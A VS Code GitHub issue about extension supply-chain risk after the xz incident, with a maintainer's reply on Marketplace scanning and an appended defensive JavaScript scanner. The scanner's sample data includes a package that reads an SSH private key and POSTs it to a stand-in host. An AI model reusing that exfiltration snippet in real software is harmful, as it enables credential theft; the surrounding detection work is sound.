microsoft / vscode

Visual Studio Code
https://code.visualstudio.com
MIT License

Highlighting of common keywords like TODO (maybe) #209403

Open cvertee opened 3 months ago

cvertee commented 3 months ago

Hi, I know this is a duplicate of #9899, but after the recent incident with xz I got curious about possible security problems with extensions and their use of npm packages, with stuff like 'package depends on a package that depends on a package with code that sends to an unknown domain'. If plugins can unintentionally use malware packages, then maybe it would be better to start porting plugins like todo highlight right into VS Code? Because, you know, they're kind of very useful. I don't know any details about VS Code's security for such problems, but if it's guaranteed that it's not possible to leak code or mine bitcoin, then close it, whatever.

isidorn commented 3 months ago

Thanks for opening this issue. And let me first say that it is possible to leak code or mine bitcoin from an extension. That is the reason why our VS Marketplace invests a lot in security. Similarly to npm, we have a lot of automated and manual scanning techniques in place. We are also investing in publisher and repository signing to increase trust in our extension ecosystem coming from the VS Marketplace. Having said that, we understand that however many safety nets we put in place, we will never be perfect. And that is why we are always adding more security layers and continuing to invest in this area.

Also we do not plan to include all extensions as part of VS Code, as that would defeat the purpose of a minimalistic text editor, and it would simply not scale.

For now I can leave this issue open for more feedback. Thank you
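The scenario cvertee describes (an extension depending on a package that depends on a package that sends data to an unknown domain) and the scanning isidorn mentions can be illustrated with a small offline check. The following is an added example written for this page; it is not code from VS Code, the Marketplace scanner, or either commenter. The dependency graph, the package sources, the hostnames and the allowlist are all constructed sample data, and the network-API patterns are a deliberately simple heuristic, not a complete detector. It walks the graph depth-first from the extension's root package and reports every chain that ends in a package whose bundled source opens outbound connections, unless every destination it names is on the allowlist; a package that reaches the network but builds its destination at runtime is reported too, because that destination cannot be vetted statically.

```javascript
// Added example (not VS Code or Marketplace code): walk an extension's dependency
// graph and report transitive chains that end in a package talking to the network.
// Everything below (packages, sources, hosts, allowlist) is constructed sample data.

const ALLOWED_HOSTS = new Set(["registry.npmjs.org", "api.github.com"]); // assumed allowlist

// Constructed sample graph: package name -> { deps, source }.
const SAMPLE_PACKAGES = {
  "todo-highlight-ext": {
    deps: ["color-util", "glob-lite", "update-check"],
    source: 'const vscode = require("vscode");',
  },
  "color-util": { deps: ["tiny-telemetry"], source: "module.exports = (c) => c.toUpperCase();" },
  "glob-lite": { deps: ["env-beacon"], source: 'const fs = require("fs");' },
  // Legitimate outbound call to an allowlisted host: must not be flagged.
  "update-check": {
    deps: [],
    source: 'fetch("https://api.github.com/repos/example/todo-highlight/releases/latest");',
  },
  // Three levels down: reads a private key and POSTs it to an unknown host.
  "tiny-telemetry": {
    deps: [],
    source: [
      'const https = require("https");',
      'const fs = require("fs");',
      'const key = fs.readFileSync(process.env.HOME + "/.ssh/id_rsa");',
      'https.request({ hostname: "telemetry.collector.example", method: "POST" }).end(key);',
    ].join("\n"),
  },
  // Destination comes from the environment, so no host literal can be extracted.
  "env-beacon": { deps: [], source: 'const net = require("net"); net.connect(443, process.env.BEACON_HOST);' },
};

// Source-level signals that a package opens outbound connections (simple heuristic).
const NETWORK_PATTERNS = [
  /\brequire\(["'](https?|net|dgram|tls)["']\)/,
  /\bfetch\(/,
  /\bnew\s+WebSocket\(/,
];

function usesNetworkApi(source) {
  return NETWORK_PATTERNS.some((re) => re.test(source));
}

// Collect hostnames named in URL literals and in { host / hostname: "..." } options.
function extractHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) hosts.add(m[1].toLowerCase());
  for (const m of source.matchAll(/\bhost(?:name)?\s*:\s*["']([a-z0-9.-]+)["']/gi)) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// Depth-first walk from the root package. Each finding records the full chain
// root -> ... -> offending package plus the hosts it names that are not allowlisted;
// an empty hosts list means the destination is resolved at runtime and cannot be vetted.
function findSuspiciousPaths(packages, root, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  const visit = (name, chain) => {
    if (chain.includes(name)) return; // cycle guard
    const pkg = packages[name];
    if (!pkg) throw new Error(`dependency "${name}" is missing from the graph`);
    const path = [...chain, name];
    if (usesNetworkApi(pkg.source)) {
      const hosts = extractHosts(pkg.source);
      const unknown = hosts.filter((h) => !allowedHosts.has(h));
      if (hosts.length === 0 || unknown.length > 0) findings.push({ path, hosts: unknown });
    }
    for (const dep of pkg.deps) visit(dep, path);
  };
  visit(root, []);
  return findings;
}

function formatFinding(f) {
  const dest = f.hosts.length ? f.hosts.join(", ") : "(destination resolved at runtime)";
  return `${f.path.join(" -> ")}: sends to ${dest}`;
}

for (const f of findSuspiciousPaths(SAMPLE_PACKAGES, "todo-highlight-ext")) {
  console.log(formatFinding(f));
}
```

Run with `node scan.js`; the two reported chains are the exfiltrating `tiny-telemetry` reached through `color-util`, and `env-beacon` reached through `glob-lite`, while `update-check` stays quiet because its only destination is allowlisted. Against a real extension the same walk would start from the VSIX's bundled `node_modules` and read each package's files from disk instead of the inline strings; the point of the chain output is that the offending package is never one the extension author chose directly.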